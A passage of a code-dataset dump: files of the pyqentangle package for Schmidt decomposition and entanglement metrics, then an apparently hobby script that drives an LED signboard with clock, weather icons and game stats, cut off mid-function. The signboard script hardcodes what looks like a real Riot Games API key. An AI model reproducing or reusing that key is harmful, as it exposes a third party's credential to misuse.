numpy.float\n\n \"\"\"\n eigenvalues = np.real(schmidt_coefficients(schmidt_modes))\n eigenvalues = np.extract(eigenvalues > 0, eigenvalues)\n entropy = np.sum(- eigenvalues * np.log(eigenvalues))\n return entropy\n\n\n# participation ratio\ndef participation_ratio(schmidt_modes):\n \"\"\"Calculate the participation ratio\n\n Given the calculated Schmidt modes, compute the participation ratio\n with the formula :math:`K=\\\\frac{1}{\\\\sum_i p_i^2}`.\n\n :param schmidt_modes: Schmidt modes\n :return: participation ratio\n :type schmidt_modes: list\n :rtype: numpy.float\n\n \"\"\"\n eigenvalues = np.real(np.real(schmidt_coefficients(schmidt_modes)))\n K = 1. / np.sum(eigenvalues * eigenvalues)\n return K\n\n\n# negativity\ndef negativity(bipartite_tensor):\n \"\"\"Calculate the negativity\n\n Given a normalized bipartite discrete state, compute the negativity\n with the formula :math:`N = \\\\frac{||\\\\rho^{\\Gamma_A}||_1-1}{2}`\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: negativity\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: numpy.float\n\n \"\"\"\n dim0, dim1 = bipartite_tensor.shape\n flatten_fullden_pt = flatten_bipartite_densitymatrix_cython(bipartitepurestate_partialtranspose_subsys0_densitymatrix_cython(bipartite_tensor)\n if dim0 < dim1\n else bipartitepurestate_partialtranspose_subsys1_densitymatrix_cython(bipartite_tensor))\n\n eigenvalues = np.linalg.eigvals(flatten_fullden_pt)\n return 0.5 * (np.sum(np.abs(eigenvalues)) - 1)\n" }, { "alpha_fraction": 0.5948041677474976, "alphanum_fraction": 0.6025591492652893, "avg_line_length": 42.71186447143555, "blob_id": "931b35b01b51610b53a2861db081da629567c0f1", "content_id": "67296af8779f737059e07c16ff5ea59dd064abb6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2579, "license_type": "permissive", "max_line_length": 138, "num_lines": 59, "path": "/setup.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "from setuptools import setup, Extension\nimport numpy as np\n\n# reference: https://stackoverflow.com/questions/46784964/create-package-with-cython-so-users-can-install-it-without-having-cython-already\ntry:\n from Cython.Build import cythonize\n ext_modules = cythonize(['pyqentangle/interpolate_nocheck.pyx',\n 'pyqentangle/bipartite_reddenmat_nocheck.pyx',\n 'pyqentangle/bipartite_denmat.pyx',\n 'pyqentangle/negativity_utils.pyx'])\nexcept ImportError:\n ext_modules = [Extension('pyqentangle.interpolate_nocheck',\n sources=['pyqentangle/interpolate_nocheck.c']),\n Extension('pyqentangle.bipartite_reddenmat_nocheck',\n sources=['pyqentangle/bipartite_reddenmat_nocheck.c']),\n Extension('pyqentangle.bipartite_denmat',\n sources=['pyqentangle/bipartite_denmat.c']),\n Extension('pyqentangle.negativity_utils',\n sources=['pyqentangle/negativity_utils.c'])]\n\n\ndef readme():\n with open('README.md') as f:\n return f.read()\n\n\nsetup(name='pyqentangle',\n version=\"2.0.0\",\n description=\"Quantum Entanglement for Python\",\n long_description=\"Schmidt decomposition for discrete and continuous bi-partite quantum systems\",\n classifiers=[\n \"Topic :: Scientific/Engineering :: Physics\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Cython\",\n \"Programming Language :: C\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\"\n ],\n keywords=\"quantum physics Schmidt decompostion entanglement\",\n url=\"https://github.com/stephenhky/pyqentangle\",\n author=\"Kwan-Yuet Ho\",\n author_email=\"[email protected]\",\n license='MIT',\n packages=['pyqentangle'],\n include_dirs=[np.get_include()],\n setup_requires=['Cython', 'numpy', ],\n install_requires=['numpy',],\n tests_require=['unittest2', 'numpy', 'scipy',],\n ext_modules=ext_modules,\n test_suite=\"test\",\n include_package_data=True,\n zip_safe=False)\n" }, { "alpha_fraction": 0.8687782883644104, "alphanum_fraction": 0.8687782883644104, "avg_line_length": 72.33333587646484, "blob_id": "d79d98d55fc4ac290d9160d4229c01d2ec965975", "content_id": "19dd138be631a20ba53de24457576cfca82462eb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "permissive", "max_line_length": 101, "num_lines": 3, "path": "/pyqentangle/__init__.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nfrom .schmidt import schmidt_decomposition\nfrom .continuous import continuous_schmidt_decomposition, OutOfRangeException, UnequalLengthException\nfrom .metrics import entanglement_entropy, participation_ratio, negativity\n" }, { "alpha_fraction": 0.6320754885673523, "alphanum_fraction": 0.7253369092941284, "avg_line_length": 34.68269348144531, "blob_id": "c6cd8088456555eeb48ae0058327a7f505a0e63f", "content_id": "1382f22139e0f70afae1831345ee96f323803c41", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3710, "license_type": "permissive", "max_line_length": 244, "num_lines": 104, "path": "/README.md", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "# Quantum Entanglement for Python\n\n[![Build Status](https://travis-ci.org/stephenhky/pyqentangle.svg?branch=master)](https://travis-ci.org/stephenhky/pyqentangle)\n[![GitHub release](https://img.shields.io/github/release/stephenhky/pyqentangle.svg?maxAge=3600)](https://github.com/stephenhky/pyqentangle/releases)\n\n## Version\n\nThe releases of `pyqentangle` 2.x.x is incompatible with previous releases.\n\n## Installation\n\nThis package can be installed using `pip`.\n\n```\n>>> pip install -U pyqentangle\n```\n\nTo use it, enter\n\n```\n>>> import pyqentangle\n>>> import numpy as np\n```\n\n## Schmidt Decomposition for Discrete Bipartite States\n\nWe first express the bipartite state in terms of a tensor. For example, if the state is `|01>+|10>`, then express it as\n\n```\n>>> tensor = np.array([[0., np.sqrt(0.5)], [np.sqrt(0.5), 0.]])\n```\n\nTo perform the Schmidt decompostion, just enter:\n\n```\n>>> pyqentangle.schmidt_decomposition(tensor)\n[(0.5000000000000001, array([ 0.+0.j, 1.+0.j]), array([ 1.+0.j, 0.+0.j])),\n (0.5000000000000001, array([ 1.+0.j, 0.+0.j]), array([ 0.+0.j, 1.+0.j]))]\n```\n\nFor each tuple in the returned list, the first element is the Schmidt coefficients, the second the component for first subsystem, and the third the component for the second subsystem.\n\n## Schmidt Decomposition for Continuous Bipartite States\n\nWe can perform Schmidt decomposition on continuous systems too. For example, define the following normalized wavefunction:\n\n```\n>>> fcn = lambda x1, x2: np.exp(-((0.5*(x1+x2))**2))*np.exp(-(x1-x2)**2)*np.sqrt(2./np.pi)\n```\n\nThen perform the Schmidt decomposition, \n\n```\n>>> decompositions = pyqentangle.continuous_schmidt_decomposition(fcn, -10., 10., -10., 10., keep=10)\n```\n\nwhere it describes the ranges of x1 and x2 respectively, and `keep=10` specifies only top 10 Schmidt modes are kept. Then we can read the Schmidt coefficients:\n\n```\n>>> list(map(lambda dec: dec[0], decompositions))\n[0.88888888888888884,\n 0.098765432098765565,\n 0.010973936899862853,\n 0.0012193263222069757,\n 0.00013548070246744356,\n 1.5053411385271871e-05,\n 1.6726012650322333e-06,\n 1.8584458500366187e-07,\n 2.0649398326795657e-08,\n 2.2943775912005789e-09]\n```\n\nThe second and the third elements in each tuple in the list `decompositions` are lambda functions for the modes of susbsystems A and B respectively. The Schmidt functions can be plotted:\n```\n>>> x1array = np.linspace(-10., 10., 100)\n>>> x2array = np.linspace(-10., 10., 100)\n>>> import matplotlib.pyplot as plt\n>>> # Eigenfunctions of the first Schmidt mode\n>>> plt.plot(x1array, decompositions[0][1](x1array))\n>>> plt.plot(x2array, decompositions[0][2](x2array))\n>>> # Eigenfunctions of the second Schmidt mode\n>>> plt.plot(x1array, decompositions[1][1](x1array))\n>>> plt.plot(x2array, decompositions[1][2](x2array))\n```\n\n![alt](fig/Figure_1A.png)\n\n![alt](fig/Figure_1B.png)\n\n![alt](fig/Figure_2A.png)\n\n![alt](fig/Figure_2B.png)\n\n\n## Useful Links\n\n* Study of Entanglement in Quantum Computers: [https://datawarrior.wordpress.com/2017/09/20/a-first-glimpse-of-rigettis-quantum-computing-cloud/](https://datawarrior.wordpress.com/2017/09/20/a-first-glimpse-of-rigettis-quantum-computing-cloud/)\n* Github page: [https://github.com/stephenhky/pyqentangle](https://github.com/stephenhky/pyqentangle)\n* PyPI page: [https://pypi.python.org/pypi/pyqentangle/](https://pypi.python.org/pypi/pyqentangle/)\n* Documentation: [http://pyqentangle.readthedocs.io/](http://pyqentangle.readthedocs.io/)\n* RQEntangle: [https://CRAN.R-project.org/package=RQEntangle](https://CRAN.R-project.org/package=RQEntangle) (corresponding R library)\n\n## Reference\n* Artur Ekert, Peter L. Knight, \"Entangled quantum systems and the Schmidt decomposition\", *Am. J. Phys.* 63, 415 (1995)." } ]
7
FinisAeternum/rgbSignboard
https://github.com/FinisAeternum/rgbSignboard
e4cdb4a4361769753e75dd2196df12ff314b1cdb
8fbfb682a2b9eaa8393c39b1e28887f92a7e5b3c
231f2033dcd9b1c3a57c87cacab7a398512cbe2f
refs/heads/master
2020-04-08T06:00:44.272175
2018-11-28T04:53:14
2018-11-28T04:53:14
159,082,611
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5209539532661438, "alphanum_fraction": 0.5927157998085022, "avg_line_length": 41.39194107055664, "blob_id": "73de182e0cc0d83ef4cebc672ef2ed03c1edaeb5", "content_id": "b5282e2bc3000f9eab371884ab222d7f09d3a7e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23146, "license_type": "no_license", "max_line_length": 117, "num_lines": 546, "path": "/boardControl.py", "repo_name": "FinisAeternum/rgbSignboard", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport time\nimport random\nimport pyowm\nimport urllib2\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom datetime import datetime\nfrom leagueoflegends import LeagueOfLegends, RiotError\nfrom rgbmatrix import Adafruit_RGBmatrix\n\nmatrix = Adafruit_RGBmatrix(32, 2)\ndegree_sign = u'\\N{DEGREE SIGN}'\nfont7 = ImageFont.truetype(\".DejaVuSans-Bold.ttf\", 7)\nfont8 = ImageFont.truetype(\".DejaVuSans-Bold.ttf\", 8)\nlol = LeagueOfLegends('RGAPI-b71a8fe2-804a-4d13-aab9-5ca9b9bca956')\n# A name dict for all degree measurements of wind to meteorological names (NNW) etc\nWIND_DIRECTION_NAME_DICT = {0: 'N', 10: 'N', 20: 'NNE', 30: 'NNE', 40: 'NE',\n 50: 'NE', 60: 'NE', 70: 'ENE', 80: 'ENE', 90: 'E',\n 100: 'E', 110: 'ESE', 120: 'ESE', 130: 'SE', 140: 'SE',\n 150: 'SE', 160: 'SSE', 170: 'SSE', 180: 'S', 200: 'SSW',\n 190: 'S', 210: 'SSW', 220: 'SW', 230: 'SW', 240: 'SW',\n 250: 'WSW', 260: 'WSW', 270: 'W', 280: 'W', 290: 'WNW',\n 300: 'WNW', 310: 'NW', 320: 'NW', 330: 'NW', 340: 'NNW',\n 350: 'NNW', 360: 'N'}\n\n\ndef get_current_time():\n return str(datetime.now().time().strftime('%H:%M'))\n\n\ndef get_curr_weather_temp(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n return int(round(curr_weather.get_temperature('fahrenheit')['temp']))\n\n\ndef get_curr_weather_wind_speed(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n return int(round(curr_weather.get_wind()['speed'] * 2.23694))\n\n\ndef get_curr_weather_wind_direction(owm):\n get_weather = owm.weather_at_id(5146277)\n curr_weather = get_weather.get_weather()\n return int(round(curr_weather.get_wind()['deg'], -1))\n\n\ndef get_league_stats():\n try:\n summoner = lol.get_summoner_by_name(\"Finis Aeternum\")\n print(summoner)\n return summoner\n except urllib2.URLError:\n print(\"League call failed. Proceeding...\")\n\n\ndef get_rand_x():\n randx = random.randint(0, 15)\n return randx\n\n\ndef get_rand_y():\n randy = random.randint(0, 20)\n return randy\n\n\ndef add_temperature_weather_image(image, curr_weather_temp_int):\n \"\"\"Adds temperature to the image supplied.\n\n :param image: The image to add temperature string to\n :param curr_weather_temp_int: The temperature value to add to the image\n \"\"\"\n draw = ImageDraw.Draw(image)\n if curr_weather_temp_int >= 80:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"#EF3B09\")\n elif curr_weather_temp_int >= 32:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"#0DBA3E\")\n else:\n draw.text((0, 19), str(curr_weather_temp_int) + degree_sign, font=font8, fill=\"42C5F4\")\n\n\ndef add_small_sun_weather_image(image):\n \"\"\"Adds a small sun to weather display area on signboard.\n\n :param image: image to add the small sun to\n \"\"\"\n draw = ImageDraw.Draw(image)\n draw.ellipse(((41, 1), (53, 13)), fill=\"#FFBB00\")\n\n\ndef add_three_clouds_weather_image(image):\n \"\"\"Adds three clouds to weather display area on signboard.\n\n :param image: image to add three clouds to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#FFFFFF\")\n draw.line((40, 4, 45, 4), fill=\"#FFFFFF\")\n draw.line((38, 5, 47, 5), fill=\"#FFFFFF\")\n draw.line((37, 6, 48, 6), fill=\"#FFFFFF\")\n draw.line((37, 7, 48, 7), fill=\"#FFFFFF\")\n draw.line((38, 8, 47, 8), fill=\"#FFFFFF\")\n draw.line((39, 9, 46, 9), fill=\"#FFFFFF\")\n # CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((49, 8, 58, 8), fill=\"#FFFFFF\")\n draw.line((48, 9, 59, 9), fill=\"#FFFFFF\")\n draw.line((48, 10, 59, 10), fill=\"#FFFFFF\")\n draw.line((49, 11, 58, 11), fill=\"#FFFFFF\")\n draw.line((50, 12, 57, 12), fill=\"#FFFFFF\")\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\n\ndef add_two_clouds_weather_image(image):\n \"\"\"Adds two clouds to weather display area on signboard.\n\n :param image: image to add two clouds to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#FFFFFF\")\n draw.line((40, 4, 45, 4), fill=\"#FFFFFF\")\n draw.line((38, 5, 47, 5), fill=\"#FFFFFF\")\n draw.line((37, 6, 48, 6), fill=\"#FFFFFF\")\n draw.line((37, 7, 48, 7), fill=\"#FFFFFF\")\n draw.line((38, 8, 47, 8), fill=\"#FFFFFF\")\n draw.line((39, 9, 46, 9), fill=\"#FFFFFF\")\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\n\ndef add_one_cloud_weather_image(image):\n \"\"\"Adds one cloud to weather display area on signboard.\n\n :param image: image to add cloud to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # TINY CLOUD\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n\ndef add_tornado_weather_image(image):\n \"\"\"Adds a tornado to weather display area on signboard.\n\n :param image: image to add tornado to\n \"\"\"\n draw = ImageDraw.Draw(image)\n # TORNADO\n draw.line((40, 1, 54, 1), fill=\"#CCCCCC\")\n draw.line((41, 2, 53, 2), fill=\"#CCCCCC\")\n draw.line((42, 3, 52, 3), fill=\"#CCCCCC\")\n draw.line((43, 4, 51, 4), fill=\"#CCCCCC\")\n draw.line((44, 5, 50, 5), fill=\"#CCCCCC\")\n draw.line((44, 6, 50, 6), fill=\"#CCCCCC\")\n draw.line((45, 7, 49, 7), fill=\"#CCCCCC\")\n draw.line((46, 8, 50, 8), fill=\"#CCCCCC\")\n draw.line((47, 9, 49, 9), fill=\"#CCCCCC\")\n draw.line((48, 10, 49, 10), fill=\"#CCCCCC\")\n draw.line((48, 11, 49, 11), fill=\"#CCCCCC\")\n draw.line((48, 12, 49, 12), fill=\"#CCCCCC\")\n draw.point((49, 13), fill=\"#CCCCCC\")\n\n\ndef display_overcast_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_overcast_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_overcast_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_overcast_clouds, curr_weather_temp_int)\n draw.text((29, 15), get_curr_weather_wind_speed(owm), font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_three_clouds_weather_image(image_overcast_clouds)\n matrix.SetImage(image_overcast_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_broken_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_broken_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_broken_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_broken_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_broken_clouds)\n add_three_clouds_weather_image(image_broken_clouds)\n matrix.SetImage(image_broken_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_scattered_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_scattered_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_scattered_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_scattered_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_scattered_clouds)\n add_two_clouds_weather_image(image_scattered_clouds)\n matrix.SetImage(image_scattered_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_few_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_few_clouds = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_few_clouds)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_few_clouds, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_small_sun_weather_image(image_few_clouds)\n add_one_cloud_weather_image(image_few_clouds)\n matrix.SetImage(image_few_clouds.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_clear_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_clear_sky = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_clear_sky)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_clear_sky, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n draw.ellipse(((39, 1), (51, 13)), fill=\"#FFBB00\")\n matrix.SetImage(image_clear_sky.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_thunderstorm_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_thunderstorm = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_thunderstorm)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_thunderstorm, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#BABABA\")\n draw.line((40, 4, 45, 4), fill=\"#BABABA\")\n draw.line((38, 5, 47, 5), fill=\"#BABABA\")\n draw.line((37, 6, 48, 6), fill=\"#BABABA\")\n draw.line((37, 7, 48, 7), fill=\"#BABABA\")\n draw.line((38, 8, 47, 8), fill=\"#BABABA\")\n draw.line((39, 9, 46, 9), fill=\"#BABABA\")\n # TINY CLOUD 1\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n # TINY CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((52, 8, 55, 8), fill=\"#FFFFFF\")\n # LIGHTNING BOLT\n draw.line((42, 10, 44, 10), fill=\"#FFED11\")\n draw.line((43, 11, 45, 11), fill=\"#FFED11\")\n draw.line((44, 11, 45, 11), fill=\"#FFED11\")\n draw.line((44, 12, 45, 12), fill=\"#FFED11\")\n draw.line((45, 13, 46, 13), fill=\"#FFED11\")\n # RAIN DROPS\n draw.line((51, 5, 52, 5), fill=\"#0078FF\")\n draw.line((52, 6, 52, 6), fill=\"#0078FF\")\n draw.line((52, 9, 52, 10), fill=\"#0078FF\")\n draw.line((54, 10, 54, 11), fill=\"#0078FF\")\n draw.line((55, 9, 55, 9), fill=\"#0078FF\")\n matrix.SetImage(image_thunderstorm.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_rain_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_rain = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_rain)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_rain, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # CLOUD 1\n draw.line((42, 3, 43, 3), fill=\"#BABABA\")\n draw.line((40, 4, 45, 4), fill=\"#BABABA\")\n draw.line((38, 5, 47, 5), fill=\"#BABABA\")\n draw.line((37, 6, 48, 6), fill=\"#BABABA\")\n draw.line((37, 7, 48, 7), fill=\"#BABABA\")\n draw.line((38, 8, 47, 8), fill=\"#BABABA\")\n draw.line((39, 9, 46, 9), fill=\"#BABABA\")\n # TINY CLOUD 1\n draw.line((51, 2, 52, 2), fill=\"#FFFFFF\")\n draw.line((49, 3, 54, 3), fill=\"#FFFFFF\")\n draw.line((50, 4, 53, 4), fill=\"#FFFFFF\")\n # TINY CLOUD 2\n draw.line((53, 6, 54, 6), fill=\"#FFFFFF\")\n draw.line((51, 7, 56, 7), fill=\"#FFFFFF\")\n draw.line((52, 8, 55, 8), fill=\"#FFFFFF\")\n # RAIN DROPS\n draw.line((40, 10, 40, 11), fill=\"#0078FF\")\n draw.line((43, 10, 43, 12), fill=\"#0078FF\")\n draw.line((45, 11, 45, 12), fill=\"#0078FF\")\n draw.line((41, 12, 41, 12), fill=\"#0078FF\")\n draw.line((42, 13, 42, 13), fill=\"#0078FF\")\n draw.line((44, 13, 44, 13), fill=\"#0078FF\")\n draw.line((46, 13, 46, 13), fill=\"#0078FF\")\n draw.line((46, 10, 46, 10), fill=\"#0078FF\")\n draw.line((51, 5, 52, 5), fill=\"#0078FF\")\n draw.line((52, 6, 52, 6), fill=\"#0078FF\")\n draw.line((52, 9, 52, 10), fill=\"#0078FF\")\n draw.line((54, 10, 54, 11), fill=\"#0078FF\")\n draw.line((55, 9, 55, 9), fill=\"#0078FF\")\n matrix.SetImage(image_rain.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_snow_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_snow = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_snow)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_snow, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # SNOWFLAKE 1\n draw.line((37, 2, 39, 4), fill=\"#FFFFFF\")\n draw.line((37, 4, 39, 2), fill=\"#FFFFFF\")\n # SNOWFLAKE 2\n draw.line((57, 3, 58, 3), fill=\"#FFFFFF\")\n draw.line((56, 4, 56, 4), fill=\"#FFFFFF\")\n draw.line((59, 4, 59, 4), fill=\"#FFFFFF\")\n draw.line((57, 5, 58, 5), fill=\"#FFFFFF\")\n # SNOWFLAKE 3\n draw.line((40, 7, 42, 7), fill=\"#FFFFFF\")\n draw.line((41, 6, 41, 8), fill=\"#FFFFFF\")\n # SNOWFLAKE 4\n draw.line((45, 6, 45, 7), fill=\"#FFFFFF\")\n draw.line((46, 5, 46, 6), fill=\"#FFFFFF\")\n # SNOWFLAKE 5\n draw.line((49, 5, 51, 7), fill=\"#FFFFFF\")\n draw.line((49, 7, 51, 5), fill=\"#FFFFFF\")\n # SNOWFLAKE 6\n draw.line((55, 8, 55, 8), fill=\"#FFFFFF\")\n draw.line((55, 10, 57, 8), fill=\"#FFFFFF\")\n # SNOWFLAKE 7\n draw.point((39, 11), fill=\"#FFFFFF\")\n draw.point((38, 12), fill=\"#FFFFFF\")\n draw.point((40, 12), fill=\"#FFFFFF\")\n draw.point((39, 13), fill=\"#FFFFFF\")\n # SNOWFLAKE 8\n draw.point((45, 9), fill=\"#FFFFFF\")\n draw.point((44, 10), fill=\"#FFFFFF\")\n draw.point((46, 10), fill=\"#FFFFFF\")\n draw.point((45, 11), fill=\"#FFFFFF\")\n # SNOWFLAKE 9\n draw.line((49, 12, 51, 12), fill=\"#FFFFFF\")\n draw.line((50, 11, 50, 13), fill=\"#FFFFFF\")\n matrix.SetImage(image_snow.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_mist_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_mist = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_mist)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_mist, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n # LINE 1\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 5\n line_co4 = 4\n else:\n line_co2 = 4\n line_co4 = 5\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n # LINE 2\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 8\n line_co4 = 7\n else:\n line_co2 = 7\n line_co4 = 8\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n # LINE 3\n for x in range(0, 18):\n line_co1 = 38 + x\n line_co3 = 39 + x\n if line_co1 % 2 == 0:\n line_co2 = 11\n line_co4 = 10\n else:\n line_co2 = 10\n line_co4 = 11\n draw.line((line_co1, line_co2, line_co3, line_co4), fill=\"#CCCCCC\")\n matrix.SetImage(image_mist.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef display_tornado_weather(owm, curr_weather_temp_int, wind_direction_name_dict):\n image_tornado = Image.new(\"RGB\", (64, 32))\n draw = ImageDraw.Draw(image_tornado)\n draw.text((0, 3), get_current_time(), font=font8, fill=\"#FFFFFF\")\n add_temperature_weather_image(image_tornado, curr_weather_temp_int)\n draw.text((29, 15), str(get_curr_weather_wind_speed(owm)) + \"MPH\", font=font8, fill=\"#FFFFFF\")\n draw.text((29, 23), wind_direction_name_dict[get_curr_weather_wind_direction(owm)], font=font8, fill=\"#FFFFFF\")\n add_tornado_weather_image(image_tornado)\n matrix.SetImage(image_tornado.im.id, 0, 0)\n time.sleep(30)\n matrix.Clear()\n\n\ndef get_ranked_color(summoner_rank):\n if summoner_rank in ['Bronze 5', 'Bronze 4', 'Bronze 3', 'Bronze 2', 'Bronze 1']:\n rank_color = '#CD7F32'\n elif summoner_rank in ['Silver 5', 